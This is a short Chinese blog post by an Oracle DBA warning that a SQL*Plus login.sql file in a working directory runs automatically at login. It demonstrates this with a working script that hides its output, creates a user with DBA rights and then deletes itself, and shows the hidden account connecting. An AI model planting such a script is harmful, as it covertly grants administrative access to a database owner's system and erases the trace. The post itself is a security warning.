ITPub博客

首页 > 数据库 > Oracle > [20140221]login.sql与系统安全.txt

[20140221]login.sql与系统安全.txt

原创 Oracle 作者:lfree 时间:2014-02-21 10:21:55 0 删除 编辑

[20140221]login.sql与系统安全.txt

--昨天帮别人解决问题,因为显示的问题我需要调整linesize的设置.我发现我的改动不生效.
--仔细检查才发现在本地目录有一个login.sql.

--因为机器是别人的,我突然想到login.sql引起的安全问题.
--如果我在login.sql包含如下内容结果如下呢?

set feedback off
set termout off
create user test1 identified by test1;
grant dba to test1;
set feedback on
host rm ~/login.sql

--以一个dba用户登录:

SCOTT@test> select username from dba_users where username='TEST1';
USERNAME
------------------------------
TEST1

1 row selected.

--退出.

$ ll login.sql
ls: login.sql: No such file or directory

$ sqlplus test1/test1
SQL*Plus: Release 11.2.0.3.0 Production on Fri Feb 21 10:12:51 2014
Copyright (c) 1982, 2011, Oracle.  All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

--看来在提供的机器使用要注意这些细节问题.特别是使用别人的机器访问自己的服务器.

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/267265/viewspace-1085037/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论
熟悉oracle相关技术,擅长sql优化,rman备份与恢复,熟悉linux shell编程。

注册时间:2008-01-03

  • 博文量
    2639
  • 访问量
    6398336